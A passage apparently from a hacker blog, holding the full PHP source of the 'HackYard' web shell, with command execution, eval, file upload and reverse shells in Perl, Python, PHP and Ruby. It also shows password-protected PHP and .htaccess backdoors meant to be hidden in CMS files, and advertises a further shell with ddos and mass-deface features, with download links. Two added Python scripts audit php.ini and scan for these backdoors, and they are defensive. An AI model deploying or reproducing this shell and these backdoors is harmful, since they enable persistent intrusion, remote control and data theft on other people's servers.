2013-05-07

HackYard team shell

This is another shell I coded a month ago; it is simple and cool ;)
It is called the HackYard shell.
<?php
// HackYard priv8 shell made by 0x0(dea) / Alb0zZ Team
// greetz to all the crew members :) n also
// PirateAL, old h4x0rs, malkit.ws, trojanforge
### hackyard.net ###

@error_reporting(E_ERROR | E_PARSE);
// ---
@ini_set("max_execution_time",0);
@set_time_limit(0);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);

if(!empty($_FILES['skedari'])){
    $tmp = $_FILES['skedari']['tmp_name'];
    $emri = $_FILES['skedari']['name'];
    move_uploaded_file($tmp, $emri);
}

function dak($xpp){
if(function_exists("system")){
system($xpp);
}
else{
if(function_exists("passthru")){
passthru($xpp);
}
else{
if(function_exists("exec")){
exec($xpp);
}
else{
if(function_exists("shell_exec")){
shell_exec($xpp);
}
else if(function_exists("popen")){
popen($xpp);
}
else{
echo 'required commands are disabled :/';
}
}
}
}
}

?>
<html>
<head>
<meta name="robots" content="noindex">
<title>HackYard shell priv8 by dea(0x0) | Mini bypasser</title>
<style ="text/css">
body{
border:0;
margin:0;
padding:0;
background:#333;
color:gray;
font-family: times, Times New Roman, times-roman, georgia, serif;
}
a:link, a:visited{
color: white;
font-weight: bold;
text-decoration: none;
padding: 3px;
}
textarea{
width: 100%;
height: 300px;
background: #000;
color: gray;
border-top: 1px solid orange;
outline: none;
margin-left:0;
margin-right:0;
}
#tbig{
width: 300px;
background: #000;
color: gray;
border: 1px solid orange;
outline: none;
}
input[type="submit"]{
background: #000;
color: gray;
border: 1px solid orange;
outline: none;
}
select, option, input[type="text"]{
outline: none;
color: gray;
border: 1px solid orange;
outline: none;
background: #000;
}
span{
color: gray;
font-weight: bold;
}
#tsmall{
width: 100px;
background: #000;
color: gray;
border: 1px solid orange;
outline: none;
}
#t20{
width:40px;
background: #000;
color: gray;
border: 1px solid orange;
outline: none;
}
#main{
width: 500px;
}
</style>
</head>
<body>
<img src="https://hackyard.net/forum/images/styles/DarkCore/style_green/logo.png">
<form action="" method="post">
<a href="?action=home">home</a><a href="?action=eval">eval</a><a href="?action=bind">bind</a><a href="?action=info">info</a> |
<?php
if(isset($_GET['action']) && $_GET['action'] == 'home'){ ?>
 <span>sys&nbsp; » </span> <input type="text" name="exec" id="tbig"> or <select name="execv">
  <option>whoami</option>
  <option>netstat -an</option>
  <option>ls -la</option>
  <option>ls</option>
  <option>uname -a</option>
  <option>dir</option>
  <option>start cmd.exe</option>
  <option>cat /etc/passwd</option>
  <option>cat /etc/hosts</option>
  <option>cat /etc/group/</option>
  <option>cat /etc/motd/</option>
  <option>cat /etc/issue/</option>
  <option>cat /etc/mysql/my.cnf</option>
  <option>cat /proc/self/environ</option>
  <option>cat /proc/environ</option>
  <option>cat /proc/cmdline</option>
</select>
<?php
}
if(isset($_GET['action']) && $_GET['action'] == 'eval'){ ?>
 <span>eval » </span> <input type="text" name="eval" id="tbig"> ex: phpinfo(); or system("ls");
<?php
}
if(isset($_GET['action']) && $_GET['action'] == 'bind'){ ?>
 <span>bind » </span> <input type="text" name="ip" id="tsmall" value="207.0.0.1"> <input type="text" name="port" id="t20" value="1337"><select name="type"><option>perl</option><option>python</option><option>php</option><option>ruby</option></select>nc -v ip port
<?php }
if(empty($_GET['action'])){ ?>
 <span>sys&nbsp; » </span> <input type="text" name="exec" id="tbig">
<?php
}
?><input type="submit" value="GO"></form>
<textarea><?php
if(isset($_POST['exec']) || !empty($_POST['execv']) && empty($_POST['eval']) && empty($_POST['bind'])){
if(empty($_POST['exec'])){
dak($_POST['execv']);
}
else{
dak($_POST['exec']);
}
}
if(isset($_POST['eval'])){
eval(stripslashes($_POST['eval']));
}
if(isset($_POST['ip']) && !empty($_POST['type']) && !empty($_POST['port'])){
$t = $_POST['type'];
$i = $_POST['ip'];
$p = $_POST['port'];

if($t == "perl"){
echo '   done

';
$pl = 'use Socket;$i="'.$i.'";$p='.$p.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
$f = fopen('pwn.pl', 'w');
fputs($f, $pl);
dak("perl pwn.pl");
}
if($t == "python"){
echo '   done

';
$y = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec?t(("'.$i.'",'.$p.'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';
$f = fopen('pwn.py', 'w');
fputs($f, $y);
dak("python pwn.py");
}
if($t == "php"){
echo '   done

';
$sock=fsockopen("'.$i.'",'.$p.');exec("/bin/sh -i <&3 >&3 2>&3");
}
if($t == "ruby"){
echo '   done

';
$rb = 'f=TCPSocket.open("'.$i.'",'.$p.').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)';
$f = fopen('pwn.rb', 'w');
fputs($f, $rb);
dak("ruby pwn.rb");
}

}

if(isset($_GET['action']) && $_GET['action'] == "info" && empty($_POST['exec']) && empty($_POST['eval']) && empty($_POST['bind'])){
echo "HackYard shell priv8 by dea(0x0) | Mini bypasser ==> sysinfo:

Server: ".gethostbyname($_SERVER["HTTP_HOST"])."    You: ".$_SERVER['REMOTE_ADDR']."    Php: ".phpversion()."    Apache: ".$_SERVER['SERVER_SOFTWARE']."    OS: ".php_uname()."    USER: ".@get_current_user()."    UID: ".@getmyuid()."    GID: ".@getmygid()."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
";
if(ini_get('safe_mode') == '1'){
echo 'Safe mode: ON
';
}
else{
echo 'Safe mode: OFF
';
}
if(ini_get('magic_quotes_gpc') == '1'){
echo 'Magic_quotes_gpc: ON
';
}
else{
echo 'Magic_quotes_gpc: OFF
';
}
if(function_exists('mysql_connect')){
echo 'Mysql: ON
';
}
else{
echo 'Mysql: OFF
';
}
if(function_exists('mssql_connect')){
echo 'Mssql: ON
';
}
else{
echo 'Mssql: OFF
';
}
if(function_exists('pg_connect')){
echo 'PostgreSQL: ON
';
}
else{
echo 'PostgreSQL: OFF
';
}
if(function_exists('ocilogon')){
echo 'Oracle: ON
';
}
else{
echo 'Oracle: OFF
';
}
if(function_exists('curl_version')){
echo 'Curl: ON
';
}
else{
echo 'Curl: OFF
';
}
if(function_exists('exec')){
echo 'Exec: ON
';
}
else{
echo 'Exec: OFF
';
}
if(!ini_get('open_basedir') != "on"){
echo 'Open_basedir: OFF
';
}
else{
echo 'Open_basedir: ON
';
}
if(!ini_get('ini_restore') != "on"){
echo 'Ini_restore: OFF
';
}
else{
echo 'Ini_restore: ON
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
}
echo 'Disable_functions: ';
if(ini_get('disable_functions') == ''){
echo '  None';
}
else{
echo ini_get('disable_functions');
}
echo "</textarea>";
}
else{
if(!isset($_POST['exec']) && empty($_POST['eval']) && empty($_POST['bind'])){
dak('dir');
}
}
?></textarea><br><br><center>
<?php


if(isset($_POST['turnoff'])){
$off = $_POST['turnoff'];
if($off == "magic_quotes_gpc"){
$handle = fopen(".htaccess", "a+");
$n = '
php_value magic_quotes_gpc off';
fputs($handle, $n);
fclose($handle);
}
else{
$handle = fopen("php.ini", "a+");
$n = '
safe_mode = Off';
fputs($handle, $n);
fclose($handle);
}
}
if(isset($_POST['bypass']) && !empty($_POST['fileb'])){
$b = $_POST['bypass'];
$f = $_POST['fileb'];
if($b == "show_source"){
show_source($f);
}
if($b == "highlight_file"){
highlight_file($f);
}
if($b == "readfile"){
readfile($f);
}
if($b == "symlink"){
fopen("sym.txt", "w");
symlink($f, "sym.txt");
show_source("sym.txt");
}
if($b == "fopen"){
$f = fopen($f, "r");
$h = fread($f, 8192);
echo stripslashes(htmlentities($h));
}
if($b == "include"){
include($f);
}
if($b == "require"){
require($f);
}
if($b == "posix_getpwuid"){
posix_getpwuid($f);
}
}

if(isset($_GET['action']) && $_GET['action'] == "info" && empty($_POST['exec']) && empty($_POST['eval']) && empty($_POST['bind'])){

}
else{
?>
<form enctype="multipart/form-data" method="post">
<b>upload</b><br><input type="file" name="skedari"><input type="submit" value="GO"></form>
<form action="" method="post">
<b>turn off</b><br>
<select name="turnoff">
<option>safe_mode</option>
<option>magic_quotes_gpc</option>
</select><input type="submit" value="GO"></form>
<form action="" method="post">
<b>bypass</b><br>
<select name="bypass">
<option>show_source</option>
<option>highlight_file</option>
<option>readfile</option>
<option>symlink</option>
<option>fopen</option>
<option>include</option>
<option>require</option>
<option>posix_getpwuid</option>
</select> file:<input type="text" name="fileb"><input type="submit" value="GO"></form>
<?php } ?>HackYard shell priv8 by dea(0x0) | Mini bypasser | <a href="http://hackyard.net">HY</a>
</center>
</body>
</html>
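
For defenders: the `dak()` helper above only works while at least one of `system`, `passthru`, `exec`, `shell_exec` or `popen` is callable, and the info panel reports whether `open_basedir` is set. The following is an added example, not part of the original post, that audits a php.ini for exactly those gaps; the sample ini text is constructed.

```python
# Functions the shell's dak() helper tries, in the order it tries them.
DAK_CHAIN = ["system", "passthru", "exec", "shell_exec", "popen"]

def parse_ini(text):
    """Return {directive: value} for a php.ini; the last assignment wins."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()   # drop ';' comments
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings

def audit(text):
    """List the settings that the shell's exec and info panels depend on."""
    ini = parse_ini(text)
    disabled = {f.strip().lower()
                for f in ini.get("disable_functions", "").split(",") if f.strip()}
    findings = [f"{fn} is callable" for fn in DAK_CHAIN if fn not in disabled]
    if not ini.get("open_basedir"):
        findings.append("open_basedir is not set")
    return findings

# Constructed sample, not taken from a real host.
SAMPLE_INI = """\
[PHP]
; partially hardened configuration
disable_functions = exec, shell_exec , SYSTEM
open_basedir =
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_INI):
        print("GAP:", finding)
```

`eval` is a language construct rather than a function, so `disable_functions` does not cover the shell's eval panel; that part has to be caught by file-integrity monitoring or content scanning.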

2012-12-25

Php & htaccess backdoors

Php backdoor

Sometimes PHP files on the server need to be backdoored to have a way to get it back.
Note! I'm not talking about encoding a PHP file to insert a backdoor into it; this is just a form which allows you to execute system commands.
I'm going to show two ways to do this: using .htaccess and using the PHP files themselves.

The good thing about the PHP method is that it can be inserted into any PHP file, for example a large forum/CMS file where the admin won't be able to find it.

A simple php backdoor:
<?php system($_GET['c']); ?>
Go to site.com/filename.php?c=whoami (filename = the file name you saved it as, whoami = system command)
Gr8, but what if we want our backdoor password protected?
<?php if(isset($_GET['pass']) && $_GET['pass'] == 'yourpass'){ system($_GET['c']);} ?>
Now go to site.com/filename.php?pass=yourpass&c=whoami

Htaccess backdoor:
By default, viewing .htaccess files in a browser is disabled by the server, so first we allow viewing of .htaccess files:

<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
Then we change the type to php executable, meaning that the file will run as php script:
AddType application/x-httpd-php .htaccess
And in the end we add the backdoor code:
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
Full script:
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
These features are also available in the albozz shell; for more, you may also want to check weevely, an awesome PHP backdoor.
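
Both backdoors in this post leave static traces a defender can sweep for: request data passed directly into a command sink in a PHP file, and an .htaccess file that is made web-readable, mapped to the PHP handler, and contains a PHP tag. The scanner below is an added example, not part of the original post; the finding labels and sample file names are made up for illustration, and the sample contents are constructed to mirror the snippets above.

```python
import re

# Request data passed straight into a command or eval sink, optionally through
# wrapper calls, e.g. system($_GET['c']) or eval(stripslashes($_POST['x'])).
SINK = re.compile(
    r"\b(system|passthru|exec|shell_exec|popen|eval)\s*\(\s*(?:\w+\s*\(\s*)*"
    r"\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)
# A handler line that makes Apache run .htaccess itself through PHP.
HT_AS_PHP = re.compile(
    r"^\s*Add(?:Type|Handler)\s+\S*php\S*\s+.*\.htaccess\b", re.I | re.M)
# A <Files> block matching \.ht names that re-grants web access to them.
HT_ALLOW = re.compile(
    r'<Files(?:Match)?\b[^>]*\\\.ht[^>]*>[^<]*'
    r'(?:Allow\s+from\s+all|Require\s+all\s+granted)', re.I)

def scan(name, text):
    """Return sorted finding labels for one file's name and contents."""
    findings = {f"request-to-{m.group(1).lower()}" for m in SINK.finditer(text)}
    if name.endswith(".htaccess"):
        if HT_AS_PHP.search(text):
            findings.add("htaccess-parsed-as-php")
        if HT_ALLOW.search(text):
            findings.add("ht-files-web-readable")
        if "<?php" in text.lower():
            findings.add("php-tag-in-htaccess")
    return sorted(findings)

# Constructed samples that mirror the snippets shown in the post.
PHP_SAMPLE = "<?php if(isset($_GET['pass'])){ system($_GET['c']);} ?>"
HTACCESS_SAMPLE = r'''<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
'''
BENIGN_SAMPLE = "<?php echo htmlspecialchars($_GET['q']); ?>"

if __name__ == "__main__":
    for name, text in [("forum/inc.php", PHP_SAMPLE),
                       ("uploads/.htaccess", HTACCESS_SAMPLE),
                       ("index.php", BENIGN_SAMPLE)]:
        print(name, scan(name, text))
```

These patterns only match request data that reaches a sink directly; flows that pass through a user-defined helper first need taint-aware tooling or file-integrity monitoring.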

2012-10-28

Alb0zZ Team Shell ░▒▓█►PRIV8 TILL NOW◄█▓▒░ ~ [Unique Features] [FREE]

By a friend, 0x0
-=-=-=-=-=-=-=-=
Some skids leaked the download link, so why don't I share it myself
Author: 0x0

I would like to give credits to:
DevilzCode (perl symlink script)
Syrian Shell (ddos & zone-h)
x-h4ck (Cloudflare ip finder)
Features
3 login attempts
ready commands
execute command
create file
chmod file
file manager
view file
download
rename
delete
upload (choose dir)
turn off magic_quotes_gpc
encode/decode
(base64/urlencode/md5/sha1/sha512)
bind/backconnect (5)
get exploit and execute
auto symlink (perl)
eval
mass script deface
processes
zone-h
ddos
mysql connect (unique)
tools (mass mail, Cloudflare, Hide Shell, CMS Fack, List Directory, Text 2 Hex, LFI Dude)
phpinfo
logout
kill shell
Screenshots (images not preserved): login, main window, file manager, htaccess tweaks, bind/backconnect, symlink, get file (exploit), tools.
NOTE: There are a few encrypted scripts inside the shell; you can decrypt them using encoder tools (not a backdoor).
Support download link: http://fileme.us/file/03hrd
Password: yuno
or, if you can't download from sharecash:
http://adf.ly/DgNoW